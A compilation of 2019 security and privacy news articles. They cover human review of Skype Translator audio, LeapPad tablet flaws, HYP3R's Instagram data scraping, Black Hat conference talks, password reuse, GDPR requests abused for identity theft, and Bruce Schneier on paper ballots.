STE WILLIAMS

Your Skype Translator calls may be heard by humans

Skype voice Translator is marketed by Microsoft in glowing terms as the machine learning (ML) “language translator that keeps getting smarter.”

Its reputation for accurately translating in near real time between ten languages (English, Spanish, French, German, Mandarin Chinese, Italian, Portuguese, Arabic, and Russian) is strong thanks, it might reasonably be assumed, to all that machine learning going on in the background.

Except that a Motherboard story quoting an unnamed Skype insider has claimed that the reason it’s so good is really because it uses human beings to help the system’s translations along by listening to snippets of real calls.

The problem? While Microsoft makes clear that audio captured using this system might be analysed, it doesn’t make clear that this is being done by people as well as machines.

Machines are just software and in their current state of development are (we hope) unlikely to have any personal opinions on what they listen to. Humans, meanwhile, introduce a very different set of possibilities.

Whoops.

Listening in

Last week, Google and Apple had to suspend contractor access to voice commands captured by Siri and Google Assistant after an outcry at the privacy implications of allowing strangers to listen to recordings of personal audio.

Earlier this week, Amazon found itself “in discussion” with the EU’s Luxembourg privacy regulator over possible privacy implications from access to Alexa voice recordings.

Suddenly, big tech companies are struggling to explain what’s really going on without sounding as if they’re trying to explain away privacy concerns – which simply makes people even more suspicious.

Skype to HAL

While Skype Translator depends on ML for the bulk of its heavy lifting, the algorithms used still need a lot of adjustment to improve their accuracy. Microsoft says as much in its Translator privacy FAQ, describing how:

To help the technology learn and grow, we verify the automatic translations and feed any corrections back into the system, to build more performant services.

Of course, this fails to explain who or what is doing the correcting.

Motherboard says it was sent audio gathered by Translator featuring all sorts of personal content, including people discussing relationships and weight loss.

Other files appeared to suggest that, as with Google, Apple and Amazon, audio from Microsoft’s voice assistant Cortana is also being listened to by contractors.

Not a good few weeks for voice-driven AI then. Machines are being used to do lots of useful and clever things, but machine learning needs to be taught, and that requires teachers. That’s not Microsoft’s fault – but it does show that not everything can be solved by turning on lots of budding HALs and leaving them to it.

Many fret that humans will be replaced by machines. For voice AI, arguably, it’s human indispensability that might be the the more immediate challenge.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/nP5shmE4_uY/

Parents, it’s time to delete Pet Chat from your child’s LeapPad

Yet another Internet of Things (IoT) product designed for kids has been shown to be pockmarked with privacy holes.

This time, it’s a tablet called LeapPad Ultimate that security researchers found to have issues that opened the door to creeps tracking children’s physical locations, sending creepster messages to them, or launching man-in-the-middle (MitM) attacks that could have snared sensitive information, including parents’ credit card data.

Scary, but the news has a silver lining: The vendor, LeapFrog, took the issues seriously and jumped on remediation lickety-split. Now all that’s left is for parents to scrape a chat app – Pet Chat – off of older tablets, as in, devices older than three years. In June 2019, LeapFrog confirmed that it had already done so on new tablets being sold in stores.

The news about LeapFrog was released at Black Hat 2019 on Wednesday by the application security testing company Checkmarx.

A rugged little thing… with holes in its shell

As Checkmarx described the tablet in a report issued on Wednesday, the LeapPad is in many ways a perfect first gizmo for kids: it’s rugged, doesn’t require Wi-Fi, and can keep tots entertained in waiting rooms or on long car trips with its kid-friendly educational apps, all without letting the little chicks wander free-range on the savage savannah of the internet.

A Kindle or iPad certainly offers plenty of apps, and even some access restrictions, but generally doesn’t provide the kind of insulation from the internet that many parents want for their young children.

However, after Checkmarx tested the LeapPad Ultimate tablet, it found that the tablet was nonetheless exposing its belly.

The problem: Pet Chat. The app lets users talk to each other in a chat room, using pet avatars and some preset phrases and emoticons. Users can only communicate with those phrases. So where’s the harm in that?

Well, thanks to a directory called Wireless Geographic Logging Engine (WiGLE) – a website that collates wireless hotspots around the world, consolidating location and information into a central database – it’s child’s play to find locations of children using the Pet Chat app. Checkmarx says that’s because Pet Chat creates a Wi-Fi Ad-Hoc connection that broadcasts to other compatible devices nearby using the SSID: PetChat.

Therefore, anybody can identify possible locations of LeapPads via Pet Chat, by finding them on public Wi-Fi or tracking their device’s MAC address.

Unfortunately, before LeapFrog leapt on a fix, Pet Chat wasn’t requiring authentication between a parent’s device and a child’s device. Anybody within range – 100 feet – could send a message to a kid’s device.

MitM attacks

Another problem the researchers found was that outgoing traffic from a LeapPad tablet wasn’t encrypted with HTTPS. Instead, the tablets were sending messages in clear-text using the HTTP protocol. That leaves outgoing traffic vulnerable to MitM attacks.

What kind of traffic are we talking about? Highly sensitive data, including:

  • Credit Card info: Brand of the card (Visa, MasterCard, etc.), name on the card, credit card number – missing six digits, expiration date, billing address, and phone number
  • Parent’s info: Email, name, account balance, and address
  • Child’s info: Name, gender, birth year, and birth month

While the credit-card numbers were missing six digits, another security hole meant that attackers could get those digits by setting up a convincing lookalike portal.

LeapSearch-portal phishing attacks

Another app on the tablet, a “child-safe” web browser called LeapSearch that only provides access to safe web content, also proved to be vulnerable to MitM attacks. In this case, researchers managed to modify the content of that “safe web” app to create what they called a “phishing version” of the portal.

It looked perfectly legit, but the researchers set it up to ask users for additional information, such as filling in the missing six digits of the credit card on file.

A model of proper response

LeapFrog done good. It responded fully and quickly. Checkmarx sent its full report to the vendor on 29 December 2018, was on a conference call about two weeks later with LeapFrog’s engineers and product managers (who asked the right questions vis-a-vis seeking more details so they could reproduce the issues), and released the first wave of fixes by 1 February 2019.

By 21 April 2019, LeapFrog told Checkmarx that it had also removed “potentially troublesome phrases” from Pet Chat. By 27 June 2019, the problematic Pet Chat app was disappeared from tablets in stores.

That kind of response is extremely heartening. There are far too many vendors who make technology that plays fast and loose with children’s privacy, enabling adults to contact kids. Often, they incur massive fines. TikTok comes to mind: the kid-addicting video-sharing app was hit with the biggest-ever fine in the US for violating the nation’s child privacy law. Then, the UK launched its own probe. All of this action came after the Federal Trade Commission noted that TikTok’s parent company was fully aware that “a significant percentage of users were younger than 13” and that it had “received thousands of complaints from parents that their children under 13 had created […] accounts”.

In spite of the complaints, FTC chair Joe Simons said that the company “still failed to seek parental consent before collecting names, email addresses and other personal information from users under the age of 13”.

Unfortunately, TikTok isn’t the only one. There was also My Friend Cayla, a Bluetooth-enabled talking/listening doll that’s gotten into trouble multiple times: Germany’s Bundesnetzagentur, the telecoms watchdog, called Cayla an “illegal espionage apparatus” that parents should destroy. Then, France said the IoT, smart, interactive Cayla was too blabby and eavesdroppy to put under the Christmas tree.

Here’s a wish, Fairy Godmother: try to get all IoT toy vendors to look to LeapFrog and leap to some conclusions about how to listen, and respond promptly, to reports about security holes in their products.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/ejkztteslLE/

Instagram boots ad partner for location tracking and scraping stories

A “preferred Facebook Marketing Partner” has secretly tracked millions of Instagram users’ locations and stories, Business Insider reported on Wednesday.

Facebook has confirmed that San Francisco-based marketing firm HYP3R scraped huge quantities of data from Instagram in order to build detailed user profiles. Profiles that included users’ physical whereabouts, their bios, their interests, and the photos that were supposed to vanish after 24 hours.

It was all done in “clear violation of Instagram’s rules,” BI reports, and Facebook has subsequently kicked HYP3R to the curb. BI reports that Instagram issued HYP3R a cease and desist letter on Wednesday after the publication presented its findings, booted it off the platform, and tweaked its platform to protect user data.

Here’s the statement that Facebook is sending to media outlets:

HYP3R’s actions were not sanctioned and violate our policies. As a result, we’ve removed them from our platform. We’ve also made a product change that should help prevent other companies from scraping public location pages in this way.

Instagram’s failure to protect location data is a “mystery”

We don’t know exactly how much data HYP3R got at. But as BI notes, the company has publicly bragged about having “a unique dataset of hundreds of millions of the highest value consumers in the world that gives an edge to the leaders in travel and retail.”

According to the publication’s sources, HYP3R sucks in more than 1 million Instagram posts per month, and more than 90% of the data it brags about comes from the platform.

Data scraping is a pervasive problem online, as BI points out. We’ve seen multiple lawsuits, naming big players, brought over the practice. In 2017, for example, a lawsuit was brought against Uber over one of its units – Marketplace Analytics – that allegedly spied on competitors worldwide for years, scraping millions of their records using automated collection systems.

Researchers have done it multiple times to Venmo, to point out how much financial activity that users publicly share. A 19-year-old from Nova Scotia got arrested for scraping freedom-of-information releases from a public website.

And Instagram? It’s a data-scraper’s darling.

There was data from 49 million accounts found lying around a few months ago – May 2019. In September 2017, we saw Redditors trying to archive every single Instagram image, be it posted publicly or stored in supposedly locked accounts.

Why? Because they could. Which brings us to HYP3R and how 3asy it was for it to st3al all that data from Fac3book’s Instagram.

BI’s sources include HYP3R insiders who question how much due diligence Instagram and Facebook do on the partners who use their platforms, as well as how well the parent company and its somewhat independent company do at safeguarding user data.

BI quoted one such source, a former HYP3R employee:

For [Instagram] to leave these endpoints open and let people get to this in a back channel sort of way, I thought was kind of hypocritical. Why they haven’t [protected user location data, for example] remains a mystery.

Granted, the company only hoovered up public data. But how many users expect their public data to be stitched together with their location data and tied up in a database to be sold off to a marketing company’s clients? These are the unauthorized ways that HYP3R got that data:

  1. An Instagram security lapse allowed it to zero in on specific user locations, like hotels and gyms, and vacuum up all the public posts made from the locations.
  2. It systematically saved users’ public Instagram stories made at those locations. That content, which includes photos shared in the stories, is supposed to disappear after 24 hours. BI calls this a clear violation of Instagram’s terms of service.
  3. It scraped public user profiles to collect information such as user bios and followers, which it then combined with the other location information and data from other sources.

Two tools to find them all, and in the darkness bind them

To get all that, HYP3R created two tools. One was created in the aftermath of Cambridge Analytica, when Instagram began to turn off some of its application programming interface’s (API’s) functionality, including letting developers search for public posts for a given location. HYP3R put a hearty face on the deprecation, at least publicly – behind the scenes, it worked to create a way to get at the location data it had been relying on, in spite of Instagram’s having turned off the location data spigot.

The result: a tool that could geofence specific locations and then harvest all public posts tagged with that location on Instagram. Which, in turn, allowed the company to build a database that, in HYP3R’s words, is stuffed with thousands of locations, including …

hotels, casinos, cruise ships, airports, fitness clubs, stadiums and shopping destinations across the globe …

… as well as hospitals, bars, and restaurants, BI reports.

The second tool is one that collects ordinary users’ Instagram stories – as in, the posts that are supposed to disappear after 24 hours. They’ve never been available through Instagram’s API, but hey, details, details – HYP3R built a tool to collect them, to save the images for all time, and to scoop up their metadata.

For what?

The purpose of collecting all this data is, of course, to target-market users. And as we’ve seen in other cases of tracking via location data, the targeting can be unnerving and invasive. It brings to mind the New York Times article from December 2018, in which the newspaper found that supposedly “trusted” apps such as GasBuddy and The Weather Channel were among at least 75 companies getting purportedly “anonymous” but pinpoint-precise location data from about 200 million smartphones across the US.

They were sharing or selling it to advertisers, retailers or even hedge funds seeking valuable insights into consumer behavior. One example: Tell All Digital, a Long Island advertising firm, buys location data, then uses it to run ad campaigns for personal injury lawyers that it markets to people who wind up in emergency rooms.

Similarly, BI asks us to imagine that an Instagram user goes on vacation, then visits a selection of locations and businesses. The Instagram story that the user posts references all those locations. Sure, it was intended to vanish after 24 hours, but instead, in the hands of a data harvester like HYP3R, it gets made into this kind of Big Data nightmare of a voyeuristic, overly intimate story – one that it keeps forever:

Imagine visiting a new city and sharing a geotagged story with friends of the hotel you visited. By itself, it doesn’t tell viewers much about you.

But combine it with the story you posted from the hospital you visited for a checkup, and the selfie you made the next day at a sports stadium, and the story from the vegetarian restaurant you ate at, and so on, and an intimate picture of your life and interests begins to emerge over weeks and months.

Make it stop

HYP3R disputes the notion that it violated Instagram’s terms of service and data policies, citing the fact that it’s only been collecting publicly shared data. Instagram said that HYP3R has, in fact, violated its rules on automated data collection.

These are the changes that Instagram is making due to the unauthorized data abuse:

  • It’s working on preventing logged-out users from getting at public location pages – something that’s been possible because of a publicly available JSON package that bundled up data into an easy-to-access format and which was available by simply appending a short string of characters to any Instagram URL.
  • Instagram revoked HYP3R’s access to its APIs and removed it from the list of Facebook Marketing Partners. Until Wednesday, you could find HYP3R on that directory, which is a curated list of companies that Facebook recommends for various tasks and services – such as planning, execution and measurement – for advertisers.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/tYg0EOUDhS8/

Pwn an iPhone to bank $1m and Check Point gripes about WhatsApp privacy again

Black Hat Here’s a quick summary of some important infosec happenings from inside and outside the Black Hat USA conference in Las Vegas on Thursday.

Apple embiggens bug-bounty program

Apple’s security engineering boss Ivan Krstić told Black Hat attendees that Cupertino is expanding its bug-bounty program in various ways. For instance, it will now cover macOS, WatchOS, and Apple TV, whereas previously it was only interested in coughing up cash for details of iOS vulnerabilities.

All researchers can now in theory, take part, too, rather than a select elite few. And the maximum payout for an exploit chain that can achieve a total and automatic iPhone takeover – no user interaction required, kernel-level, and persistent, and requiring just a victim’s cellphone number – will be upped to $1m from $200,000. There’s also $500,000 awaiting you if you can pwn an iPhone over the network without any user interaction.

Developer-mode iPhones that grant access to the firmware and operating system, to make finding low-level holes easier, will be given to selected infosec gurus to probe. There will also be a 50 per cent bonus on bounties for bugs reported in pre-release software before it is unleashed on the public.

Check Point continues beef with WhatsApp

Around this time last year, Check Point revealed it was possible to slyly manipulate messages in private and group WhatsApp conversations. At the time, the chat app’s maker Facebook didn’t think it was too big a deal, and it still doesn’t: according to Check Point’s reps at Black Hat this Thursday, the weaknesses remain largely unfixed.

A miscreant could send a private message to a group chat participant that, confusingly, appeared as a public message was addressed by WhatsApp, we’re told. However, Check Point claimed this week it “found that it is still possible to manipulate quoted messages and spread misinformation from what appear to be trusted sources.”

Basically, it’s possible to tamper with quoted messages in replies, which could trick people into thinking the quoted person sent a text they didn’t actually send.

Facebook’s having none of it, though. In a statement to the media, the antisocial network said: “It is false to suggest there is a vulnerability with the security we provide on WhatsApp.

“The scenario described here is merely the mobile equivalent of altering replies in an email thread to make it look like something a person didn’t write.”

Windows process injection research

Eggheads at infosec biz SafeBreach claim they have unearthed at least 20 ways miscreants on a computer can inject malicious code into legit processes on Windows to further compromise the box. That’s up from the six or seven methods most white and black hats seem to be aware of for Microsoft’s operating system.

These so-called process injection attacks are useful for commandeering privileged applications, and transforming them into powerful malware that can snoop on users and steal data. It’s also a neat way to evade antivirus tools because the victim process is typically trusted and is not expected to turn rogue.

“It allows the malware to establish a long-term presence in the target machine while reducing the likelihood of getting detected or quarantined,” is how Amit Klein, veep of security research at SafeBreach, put it to The Register. He spoke to us ahead of his talk with Itzik Kotler at this week’s Black Hat conference in Las Vegas. The pair are due to give the same talk at DEF CON in Sin City on Friday.

“If the malware can move to an Office or system or mail process, any process that is benign, that is well-known or signed, then the malware stands a much better chance of propagating,” Klein continued.

The hope is that, by understanding and documenting how different process injection attacks work – the techniques were gleaned from all sorts of sources, including proof-of-concept code – antivirus makers will be better able to spot process injection as it happens, while developers will be better able to harden applications and take measures to keep malware from altering their processes.

And finally…

As rumored for a while now, Broadcom has finally acquired Symantec’s enterprise business for $11bn in cash. Our full report is here. ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/black_hat_roundup/

Who will save us from deepfakes? Other AIs? Humans? What about vastly hyperintelligent pandimensional beings?

Black Hat Deepfakes, the AI-generated talking heads that can say whatever their creator wants them to, are getting harder to detect. But boffins have enlisted an unlikely ally in the quest for truth – mice.

In a presentation at the Black Hat security conference in Las Vegas, data scientists examined various ways to identify deepfake videos – something that is going to become increasingly important as US elections approach in 2020.

George Williams, director of data science at GSI, explained that AIs are better at spotting deepfakes than fleshbags. Earlier this year, humans were pitted against a generative adversarial network (GAN) to call out a selection of deepfakes, and the carbon-based humanoids did pretty well, spotting 88 per cent of fakes. But the machines managed an average rate of 92 per cent.

“That seems pretty good, but when you consider the sheer volume of content that can be put out on social media, you’re going to see a lot of mistakes and false positives,” he said. “Some of the content will get past both humans and machines.”

One solution is to build bigger and better AI systems, said Alexander Comerford, a data science software engineer at Bloomberg LP. And the flood of deepfakes might not be so bad – at first.

“Doing deepfakes is really hard, the infamous Obama one took 17 hours of presidential addresses footage to create,” Comerford said. “If you’re not a public figure, 17 hours is a lot of data to find. It also took two weeks to train on CPU or two hours on a GPU, and we don’t know how long the final touches on the teeth and other features.”

More advanced GANS can be created to deal with the issues of deepfakes, but they still have problems because AI systems have problems dealing with the pitch and tone of human voices. The frequency of voices might be one route forward – the letters b and v sound similar but are on completely different frequencies.

Facebook CEO Mark Zuckerberg

Facebook won’t nuke deepfakes? OK, let’s tear up those precious legal protections from user-posted content, then

READ MORE

But there are other biological systems that could do better. Jonathan Saunders, a graduate student at the University of Oregon, explained that mice are actually pretty good at spotting human voices and can be trained to do so.

The team trained mice to recognise human speech and got a 75 per cent detection rate for a human using simple speech. That dropped to 65 per cent for complex vocabulary but, by monitoring the neural pattern in a mouse’s head, the team reckons this could be an important tool in helping to train AI systems to get better at spotting a fake video.

“We think it’s time to use auditory systems, so we should train mice to detect fake and real speech,” he said. “People are good at spotting fakes but it’s going to be a cat-and-mouse game.” [Cue muffled groans from the audience.]

You can read the full research here [PDF]. ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/deepfakes_mice/

It’s (Still) the Password, Stupid!

The best way to protect your identity in cyberspace is the simplest: Use a variety of strong passwords, and never, ever, use “123456” no matter how easy it is to type.

Stop me if you’ve heard this one before. Last year, billions of credentials were exposed due to thousands of data breaches. Many of the companies that were hacked didn’t tell anyone until months after the fact, and the most common password exposed during these breaches was … 123456.

I know, right? Same old story.

At this point, I’d love to tell you that there was something new and exciting about these breaches. In some ways, there is: The poor security used by many large companies is under greater scrutiny than ever before. But in other ways, these exposures reinforce the importance of the advice that’s been around for years: Choose a strong password and, where you can, don’t use a password at all.

The most succinct summary of the scale of data breaches in 2018 comes courtesy of SpyCloud, a firm specializing in security analysis and anti-account takeover solutions. It reports that in 2018 it was able to recover 3.5 billion credentials from 2,882 breached sources and managed to decrypt 87% of the passwords contained in this data.

A deeper analysis reveals more troubling factors. One is that it’s not clear that many of the “data breaches” reported in the press last year were data breaches at all. In some cases, companies merely released data that they had permission to release — for example, Facebook’s controversial “research project,” reported by TechCrunch, that involved releasing a data-mining app (subsequently blocked) to consumers that was intended for internal corporate use under Apple’s licensing agreement. The second worrying issue is the ongoing prevalence of email scams, which still account for the vast majority of hacks for which a worrying number of people still fall.

And then we come to companies’ responses to these breaches. MyFitnessPal, owned by Under Armour, unintentionally shared the credentials of at least 150 million users in a much-publicized hack, but one that only came to light weeks after it had happened. Quora, in a similar attack, had 100 million user names, passwords, and other data stolen.

Now, you might think that MyFitnessPal and Quora are hardly the most important accounts in your life, and that’s true. Neither carries detailed financial information or personal photographs. The problem is that too many people use the same password for these apps as they do for all of their online accounts, and so a breach of even a “low-level” account can have huge consequences both in yielding access to other accounts and driving customers away from the affected company for good.

Password Hashing
It’s also worth looking at how passwords and other information was extracted from the data stolen from Quora and MyFitnessPal.

The stolen data was encrypted, as well it should be. Instead of a plaintext password, the breached information contained hashes of passwords. These are codes generated from passwords by an encryption algorithm, and many companies (including these two, it turns out) think that this makes them secure.

It doesn’t. Or, rather, it would if they were using quality algorithms. Unfortunately, the encryption scheme used by both companies — md5 and sha1, respectively — are now pretty easy for cybercriminals to overcome. There are even free pieces of software that will do this for them.

So, the companies involved in these hacks were certainly at blame, but only partially. A closer look at the data in the breaches also reveals that poor security practices on the part of users also made the hackers’ job a lot easier.

Password Reuse
To see why that is, it’s worth looking at the most common passwords that were exposed during these breaches.

Here they are: 123456 123456789 password qwerty 12345 qwerty123 1q2w3e 123123 111111 12345678 1234567 1234567890 abc123 anhyeuem iloveyou password1 123456789 123321 qwertyuiop 654321 123456 121212 asdasd 666666 zxcvbnm 987654321 112233 123456a 123123123 123qwe 11111111 aaaaaa qwe123 dragon 1234 1q2w3e4r5t reset zinch 25251325 monkey a123456 1qaz2wsx 1q2w3e4r 123654 159753 222222 asdfghjkl 147258369 999999 5201314 123abc qweqwe 456789 555555 7777777 qazwsx princess qwerty1 1111111 football j38ifUbn asdfgh 66bob 888888 163.com 147258 asd123 azerty sunshine 789456 3rJs1la7qE 159357 michael 789456123 88888888 1234qwer daniel Password abcd1234 myspace1 computer 987654321 shadow qqqqqq 1234561 killer superman pokemon 987654 master q1w2e3r4t5y6 baseball 777777 123456789a charlie 11223344 333333 soccer x4ivygA51F

It gets even worse when you realize that the kind of person who uses 123456 as a password is probably using this password for all of their online accounts.

And so the issue is not that someone gets access to a Quora account. It’s that password reuse is still common practice despite the penetration of password management software into the mainstream, nearly all of which uses AES 256-bit encryption. The best advice, besides letting your computer do the managing for you, is to use a variety of strong passwords and never, ever, use 123456, no matter how easy it is to type.

Related Content:

Sam Bocetta is a freelance journalist specializing in U.S. diplomacy and national security, with emphases on technology trends in cyber warfare, cyber defense, and cryptography. Previously, Sam was a defense contractor. He worked in close partnership with architects and … View Full Bio

Article source: https://www.darkreading.com/endpoint/its-(still)-the-password-stupid!/a/d-id/1335430?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Talk about unintended consequences: GDPR is an identity thief’s dream ticket to Europeans’ data

Black Hat When Europe introduced the General Data Protection Regulation (GDPR) it was supposed to be a major step forward in data safety, but sloppy implementation and a little social engineering can make it heaven for identity thieves.

In a presentation at the Black Hat security conference in Las Vegas James Pavur, a PhD student at Oxford University who usually specialises in satellite hacking, explained how he was able to game the GDPR system to get all kinds of useful information on his fiancée, including credit card and social security numbers, passwords, and even her mother’s maiden name.

“Privacy laws, like any other infosecurity control, have exploitable vulnerabilities,” he said. “If we’d look at these vulnerabilities before the law was enacted, we could pick up on them.”

Pavur’s research started in an unlikely place – the departure lounge of a Polish airport. After the flight he and his fiancée were supposed to travel on was delayed, they joked about spamming the airline with GDPR requests to get revenge. They didn’t, but it sparked an idea to see what information you could get on other people and Pavur’s partner agreed to act as a guinea pig for the experiment.

For social engineering purposes, GDPR has a number of real benefits, Pavur said. Firstly, companies only have a month to reply to requests and face fines of up to 4 per cent of revenues if they don’t comply, so fear of failure and time are strong motivating factors.

In addition, the type of people who handle GDPR requests are usually admin or legal staff, not security people used to social engineering tactics. This makes information gathering much easier.

Over the space of two months Pavur sent out 150 GDPR requests in his fiancée’s name, asking for all and any data on her. In all, 72 per cent of companies replied back, and 83 companies said that they had information on her.

Interestingly, 5 per cent of responses, mainly from large US companies, said that they weren’t liable to GDPR rules. They might be in for a rude shock if that comes before the courts.

Of the responses, 24 per cent simply accepted an email address and phone number as proof of identity and sent over any files they had on his fiancée. A further 16 per cent requested easily forged ID information and 3 per cent took the rather extreme step of simply deleting her accounts.

A lot of companies asked for her account login details as proof of identity, which is actually a pretty good idea, Pavur opined. But when one gaming company tried it, he simply said he’d forgotten the login and they sent it anyway.

The range of information the companies sent in is disturbing. An educational software company sent Pavur his fiancée’s social security number, date of birth and her mother’s maiden name. Another firm sent over 10 digits of her credit card number, the expiration date, card type and her postcode.

A threat intelligence company – not Have I been Pwned – sent over a list of her email addresses and passwords which had already been compromised in attacks. Several of these still worked on some accounts – Pavur said he has now set her up with a password manager to avoid repetition of this.

gdpr

Marketing biz bares folks’ data in the act of asking for their GDPR comms preferences

READ MORE

“An organisation she had never heard of, and never interacted with, had some of the most sensitive data about her,” he said. “GDPR provided a pretext for anyone in the world to collect that information.”

Fixing this issue is going to take action from both legislators and companies, Pavur said.

First off, lawmakers need to set a standard for what is a legitimate form of ID for GDPR requests. One rail company was happy to send out personal information, accepting a used envelope addressed to the fiancée as proof of identity.

He suggested requesting account login details were a good idea, but there’s always the possibility that such accounts have been pwned. A driver’s licence would also be a good alternative, although fake IDs are rife.

Companies should be prepared to refuse information requests unless proper proof is required, he suggested. It may come to a court case, but being seen to protect the data of customers would be no bad thing. ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/gdpr_identity_thief/

Pwn an iPhone to bank $1m, Check Point gripes about WhatsApp privacy again, Broadcom eats Symantec enterprise biz

Black Hat Here’s a quick summary of some important infosec happenings from inside and outside the Black Hat USA conference in Las Vegas on Thursday.

Apple embiggens bug-bounty program

Apple’s security engineering boss Ivan Krstić told Black Hat attendees that Cupertino is expanding its bug-bounty program in various ways. For instance, it will now cover macOS, WatchOS, and Apple TV, whereas previously it was only interested in coughing up cash for details of iOS vulnerabilities.

All researchers can now in theory, take part, too, rather than a select elite few. And the maximum payout for an exploit chain that can achieve a total and automatic iPhone takeover – no user interaction required, kernel-level, and persistent, and requiring just a victim’s cellphone number – will be upped to $1m from $200,000. There’s also $500,000 awaiting you if you can pwn an iPhone over the network without any user interaction.

Developer-mode iPhones that grant access to the firmware and operating system, to make finding low-level holes easier, will be given to selected infosec gurus to probe. There will also be a 50 per cent bonus on bounties for bugs reported in pre-release software before it is unleashed on the public.

Check Point continues beef with WhatsApp

Around this time last year, Check Point revealed it was possible to slyly manipulate messages in private and group WhatsApp conversations. At the time, the chat app’s maker Facebook didn’t think it was too big a deal, and it still doesn’t: according to Check Point’s reps at Black Hat this Thursday, the weaknesses remain largely unfixed.

A miscreant could send a private message to a group chat participant that, confusingly, appeared as a public message was addressed by WhatsApp, we’re told. However, Check Point claimed this week it “found that it is still possible to manipulate quoted messages and spread misinformation from what appear to be trusted sources.”

Basically, it’s possible to tamper with quoted messages in replies, which could trick people into thinking the quoted person sent a text they didn’t actually send.

Facebook’s having none of it, though. In a statement to the media, the antisocial network said: “It is false to suggest there is a vulnerability with the security we provide on WhatsApp.

“The scenario described here is merely the mobile equivalent of altering replies in an email thread to make it look like something a person didn’t write.”

Windows process injection research

Eggheads at infosec biz SafeBreach claim they have unearthed at least 20 ways miscreants on a computer can inject malicious code into legit processes on Windows to further compromise the box. That’s up from the six or seven methods most white and black hats seem to be aware of for Microsoft’s operating system.

These so-called process injection attacks are useful for commandeering privileged applications, and transforming them into powerful malware that can snoop on users and steal data. It’s also a neat way to evade antivirus tools because the victim process is typically trusted and is not expected to turn rogue.

“It allows the malware to establish a long-term presence in the target machine while reducing the likelihood of getting detected or quarantined,” is how Amit Klein, veep of security research at SafeBreach, put it to The Register. He spoke to us ahead of his talk with Itzik Kotler at this week’s Black Hat conference in Las Vegas. The pair are due to give the same talk at DEF CON in Sin City on Friday.

“If the malware can move to an Office or system or mail process, any process that is benign, that is well-known or signed, then the malware stands a much better chance of propagating,” Klein continued.

The hope is that, by understanding and documenting how different process injection attacks work – the techniques were gleaned from all sorts of sources, including proof-of-concept code – antivirus makers will be better able to spot process injection as it happens, while developers will be better able to harden applications and take measures to keep malware from altering their processes.

And finally…

As rumored for a while now, Broadcom has finally acquired Symantec’s enterprise business for $11bn in cash. ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/black_hat_roundup/

You can easily secure America’s e-voting systems tomorrow. Use paper – Bruce Schneier

Black Hat While various high-tech solutions to secure electronic voting systems are being touted this week to election officials across the United States, according to infosec guru Bruce Schneier there is only one tried-and-tested approach that should be considered: pen and paper.

It’s the only way to be sure hackers and spies haven’t delved in from across the web to screw with your vote.

“Paper ballots are almost 100 per cent reliable and provide a voter-verifiable paper trail,” he told your humble Reg vulture and other hacks at Black Hat in Las Vegas on Thursday. “This isn’t hard or controversial. We use then all the time in Minnesota, and you make your vote and it’s easily tabulated.”

The integrity of the election process depends on three key areas: the security of the voter databases that list who can vote; the electronic ballot boxes themselves, which Schneier opined were the hardest things to hack successfully; and the computers that tabulate votes and distribute this information.

Election security is a hot topic at the Black Hat and DEF CON hacking conferences this year, and a matter of increasing national concern. Two pieces of legislation, one requiring paper ballots be produced for every vote, and another requiring parties to inform the FBI if foreign governments quietly hit them, passed the US House of Representatives last month.

However, Senate majority leader Mitch McConnell (R-KY) has refused to table the legislation in the upper house, saying the bills were partisan. Entirely coincidentally, it has subsequently come out that “Moscow Mitch” accepted thousands of dollars in lobbying cash from election machine manufacturers.

“The problem with election security is politics,” Schneier said. “We have a party in the US that doesn’t favor voting.”

Warning signs

Schneier’s comments came on the same day that investigative reporter Kim Zetter revealed that America’s election management systems that are not supposed to be connected to the internet long term were, and still are, in fact connected to the internet.

We’re told ten security eggheads found that dozens of back-end election systems manufactured by ESS had been left facing the internet for ages. The systems are designed to receive preliminary voting tallies from ballot machines after the polls close, remaining online for a very short period, and yet many were still lingering around on the ‘net to this day. They do not count up the final results, it must be stressed: those totals are obtained by extracting data from the memory cards in the individual voting machines and processing all that offline.

The idea is that, during election night after the polls close, these back-end internet-connected systems receive initial tallies from e-voting boxes via SFTP behind a Cisco firewall, yet they end up being left online for many months after. If someone were to hack into these back-end computers and tamper with them on a crucial election evening, the preliminary counts arriving from the e-ballot boxes – figures that are quickly handed to the media for live analysis – could be intercepted and altered so that when the official numbers come in from the memory cards, there is enough mistrust among the public that no one believes which result is real.

It’s a bit of a stretch: you’d need to pwn the SFTP server after getting through the filters on the Cisco firewall. Yet, it would be lovely if officials could get on top of their IT equipment, and take offline systems that are supposed to be offline, as America gears up for the crucial 2020 White House race.

The government is here to help

Schneier also spoke of the importance of technically skilled people getting into government, a topic he has raised before.

The technical knowledge of most congresscritters is sadly lacking, Schneier said, and they need good advice. He pointed to a big improvement in the statements issued by Senator Ron Wyden (D-OR) after the ACLU’s Christopher Soghoian joined his team.

Schneier suggested that technologists can do the most good for the country by avoiding running for public office, and instead join regulatory agencies. Legislators may enact major new laws on technology once a decade or so, but federal agencies are much more flexible and can make policy quickly and often.

bruce

QA: Crypto-guru Bruce Schneier on teaching tech to lawmakers, plus privacy failures – and a call to techies to act

READ MORE

He was blisteringly scathing about the Active Cyber Defense Bill, being considered by Congress. The legislation, introduced by House Representative Tom Graves (R-GA) would legalize “hacking back,” whereby if a company is pwned online, it can legally go after their attacker.

“I’m sure there are some IT managers who would love to break out the attack code but it’s a terrible idea,” he said. “There’s a good reason why we give government a monopoly on violence: vigilante mobs get it wrong.”

He was also dismissive at recent noises from the US and other Five Eyes nations to force technology companies to introduce backdoors into encryption exclusively for law enforcement to use. Such calls have been going on since the 1990s, he pointed out, and so far it had been all talk.

“We’ve seen the Australian law passed, and the UK is moving on it too,” he said. “But in the US we have a very different relationship with government. Americans just don’t trust their governments as much as the UK and Australia.” ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/schneier_voting_security/

Ransomware Shifts Focus from Consumers to Businesses

In addition, ransomware seems likely to continue its evolution in the second half of 2019.

